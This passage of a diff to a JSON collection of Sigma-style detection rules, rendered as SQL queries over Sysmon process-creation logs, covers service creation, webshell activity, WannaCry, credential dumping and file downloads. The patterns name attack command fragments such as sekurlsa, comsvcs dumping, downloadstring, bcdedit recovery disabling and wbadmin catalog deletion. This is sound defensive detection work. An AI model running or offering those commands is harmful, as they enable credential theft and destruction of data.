OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tapinstall_execution.yml" + "filename": "proc_creation_win_susp_service_creation.yml" }, { - "title": "Psr.exe Capture Screenshots", - "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "title": "New Service Creation Using Sc.EXE", + "id": "85ff530b-261d-48c6-a441-facaa2e81e48", "status": "test", - "description": "The psr.exe captures desktop screenshots and saves them on the local machine", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of a new service using the \"sc.exe\" utility.", + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.collection", - "attack.t1113" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Legitimate administrator or user creates a service for legitimate reasons.", + "Software installation" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Psr.exe' ESCAPE '\\' AND CommandLine LIKE '%/start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\')" ], - "filename": "proc_creation_win_psr_capture_screenshots.yml" + "filename": "proc_creation_win_sc_create_service.yml" }, { - "title": "Suspicious Desktopimgdownldr Command", - "id": "bb58aa4a-b80b-415a-a2c0-2f65a4c81009", - "status": "test", - "description": "Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Invoke-WebRequest Execution With DirectIP", + "id": "1edff897-9146-48d2-9066-52e8d8f80a2f", + "status": "experimental", + "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", "attack.t1105" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '% /lockscreenurl:%' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\'))) OR (CommandLine LIKE '%reg delete%' ESCAPE '\\' AND CommandLine LIKE '%\\\\PersonalizationCSP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_desktopimgdownldr_susp_execution.yml" + "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" }, { - "title": "Shells Spawned by Web Servers", - "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "title": "WannaCry Ransomware Activity", + "id": "41d40bff-377a-43e2-8e1b-2e543069e079", "status": "test", - "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", - "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects WannaCry ransomware activity", + "author": "Florian Roth (Nextron Systems), Tom U. @c_APT_ure (collection), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1190" + "attack.lateral_movement", + "attack.t1210", + "attack.discovery", + "attack.t1083", + "attack.defense_evasion", + "attack.t1222.001", + "attack.impact", + "attack.t1486", + "attack.t1490" ], "falsepositives": [ - "Particular web applications may spawn a shell process legitimately" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\tasksche.exe' ESCAPE '\\' OR Image LIKE '%\\\\mssecsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskdl.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhsvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskse.exe' ESCAPE '\\' OR Image LIKE '%\\\\111.exe' ESCAPE '\\' OR Image LIKE '%\\\\lhdfrgui.exe' ESCAPE '\\' OR Image LIKE '%\\\\linuxnew.exe' ESCAPE '\\' OR Image LIKE '%\\\\wannacry.exe' ESCAPE '\\') OR Image LIKE '%WanaDecryptor%' ESCAPE '\\' OR (CommandLine LIKE '%icacls%' ESCAPE '\\' AND CommandLine LIKE '%/grant%' ESCAPE '\\' AND CommandLine LIKE '%Everyone:F%' ESCAPE '\\' AND CommandLine LIKE '%/T%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%/Q%' ESCAPE '\\') OR (CommandLine LIKE '%bcdedit%' ESCAPE '\\' AND CommandLine LIKE '%/set%' ESCAPE '\\' AND CommandLine LIKE '%{default}%' ESCAPE '\\' AND CommandLine LIKE '%recoveryenabled%' ESCAPE '\\' AND CommandLine LIKE '%no%' ESCAPE '\\') OR (CommandLine LIKE '%wbadmin%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%-quiet%' ESCAPE '\\') OR CommandLine LIKE '%@Please\\_Read\\_Me@.txt%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_webshell_spawn.yml" + "filename": "proc_creation_win_malware_wannacry.yml" }, { - "title": "Changing Existing Service ImagePath Value Via Reg.EXE", - "id": "9b0b7ac3-6223-47aa-a3fd-e8f211e637db", - "status": "test", - "description": "Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.\nWindows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services\n", - "author": "frack113", + "title": "Security Privileges Enumeration Via Whoami.EXE", + "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "status": "experimental", + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1574.011" + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%SYSTEM\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND CommandLine LIKE '% ImagePath %' ESCAPE '\\' AND (CommandLine LIKE '% /d %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_service_imagepath_change.yml" + "filename": "proc_creation_win_whoami_priv_discovery.yml" }, { - "title": "Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32", - "id": "bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0", - "status": "test", - "description": "Detects potential BlueMushroom DLL loading activity via regsvr32 from AppData Local", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Download Arbitrary Files Via PresentationHost.exe", + "id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", + "status": "experimental", + "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%,DllEntry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\presentationhost.exe' ESCAPE '\\' OR OriginalFileName = 'PresentationHost.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_aptc12_bluemushroom.yml" + "filename": "proc_creation_win_lolbin_presentationhost_download.yml" }, { - "title": "Webshell Hacking Activity Patterns", - "id": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", - "status": "experimental", - "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", - "author": "Florian Roth (Nextron Systems)", + "title": "Shells Spawned by Web Servers", + "id": "8202070f-edeb-4d31-a010-a26c72ac5600", + "status": "test", + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "author": "Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.t1190" ], "falsepositives": [ - "Unlikely" + "Particular web applications may spawn a shell process legitimately" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%comsvcs%' ESCAPE '\\') OR (CommandLine LIKE '% -hp%' ESCAPE '\\' AND CommandLine LIKE '% a %' ESCAPE '\\' AND CommandLine LIKE '% -m%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% user %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%net%' ESCAPE '\\' AND CommandLine LIKE '% localgroup %' ESCAPE '\\' AND CommandLine LIKE '% administrators %' ESCAPE '\\' AND CommandLine LIKE '%/add%' ESCAPE '\\') OR (Image LIKE '%\\\\ntdsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR Image LIKE '%\\\\adfind.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\Nanodump.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\') OR (CommandLine LIKE '% -NoP %' ESCAPE '\\' OR CommandLine LIKE '% -W Hidden %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '% /decode %' ESCAPE '\\' OR CommandLine LIKE '%reg save %' ESCAPE '\\' OR CommandLine LIKE '%.downloadstring(%' ESCAPE '\\' OR CommandLine LIKE '%.downloadfile(%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% /ticket:%' ESCAPE '\\' OR CommandLine LIKE '% sekurlsa%' ESCAPE '\\' OR CommandLine LIKE '%.dmp full%' ESCAPE '\\' OR CommandLine LIKE '%process call create%' ESCAPE '\\' OR CommandLine LIKE '%whoami /priv%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_TomcatService.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\UMWorkerProcess.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentCommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR ParentCommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\' OR ParentCommandLine LIKE '%catalina.home%' ESCAPE '\\'))) AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\at.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsget.exe' ESCAPE '\\' OR Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR Image LIKE '%\\\\find.exe' ESCAPE '\\' OR Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\hostname.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\nbtstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\netdom.exe' ESCAPE '\\' OR Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntdutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\ping.exe' ESCAPE '\\' OR Image LIKE '%\\\\qprocess.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\' OR Image LIKE '%\\\\qwinsta.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\ver.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wusa.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%Windows\\\\system32\\\\cmd.exe /c C:\\\\ManageEngine\\\\ADManager \"Plus\\\\ES\\\\bin\\\\elasticsearch.bat -Enode.name=RMP-NODE1 -pelasticsearch-pid.txt' ESCAPE '\\') OR (CommandLine LIKE '%sc query%' ESCAPE '\\' AND CommandLine LIKE '%ADManager Plus%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_webshell_hacking.yml" + "filename": "proc_creation_win_webshell_spawn.yml" }, { - "title": "Disable Important Scheduled Task", - "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "title": "Process Creation Using Sysnative Folder", + "id": "3c1b5fb0-c72f-45ba-abd1-4d4c353144ab", "status": "experimental", - "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE 'C:\\\\Windows\\\\Sysnative\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_disable.yml" + "filename": "proc_creation_win_susp_sysnative.yml" }, { - "title": "Suspicious ZipExec Execution", - "id": "90dcf730-1b71-4ae7-9ffc-6fcf62bd0132", - "status": "test", - "description": "ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.", + "title": "System Network Connections Discovery Via Net.EXE", + "id": "1c67a717-32ba-409b-a45d-0fb704a73a81", + "status": "experimental", + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.discovery", + "attack.t1049" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%/generic:Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\' AND CommandLine LIKE '%/pass:%' ESCAPE '\\' AND CommandLine LIKE '%/user:%' ESCAPE '\\') OR (CommandLine LIKE '%/delete%' ESCAPE '\\' AND CommandLine LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename=%' ESCAPE '\\' AND CommandLine LIKE '%.zip%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND ((CommandLine LIKE '% use' ESCAPE '\\' OR CommandLine LIKE '% sessions' ESCAPE '\\') OR (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% sessions %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_zipexec.yml" + "filename": "proc_creation_win_net_network_connections_discovery.yml" }, { - "title": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN", - "id": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", - "status": "test", - "description": "dotnet.exe will execute any DLL and execute unsigned code", - "author": "Beyu Denis, oscd.community", + "title": "Import LDAP Data Interchange Format File Via Ldifde.EXE", + "id": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", + "status": "experimental", + "description": "Detects the execution of \"Ldifde.exe\" with the import flag \"-i\". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.\n", + "author": "@gott_cyber", "tags": [ - "attack.execution", - "attack.t1218" + "attack.command_and_control", + "attack.defense_evasion", + "attack.t1218", + "attack.t1105" ], "falsepositives": [ - "System administrator Usage" + "Since the content of the files are unknown, false positives are expected" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dotnet.exe' ESCAPE '\\' OR OriginalFileName = '.NET Host') AND (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.csproj' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ldifde.exe' ESCAPE '\\' OR OriginalFileName = 'ldifde.exe') AND (CommandLine LIKE '%-i%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_dotnet.yml" + "filename": "proc_creation_win_ldifde_file_load.yml" }, { - "title": "Potential Reconnaissance For Cached Credentials Via Cmdkey.EXE", - "id": "07f8bdc2-c9b3-472a-9817-5a670b872f53", + "title": "Suspicious Parent Double Extension File Execution", + "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", "status": "experimental", - "description": "Detects usage of cmdkey to look for cached credentials on the system", - "author": "jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect execution of suspicious double extension files in ParentCommandLine", + "author": "frack113, Nasreddine Bencherchali 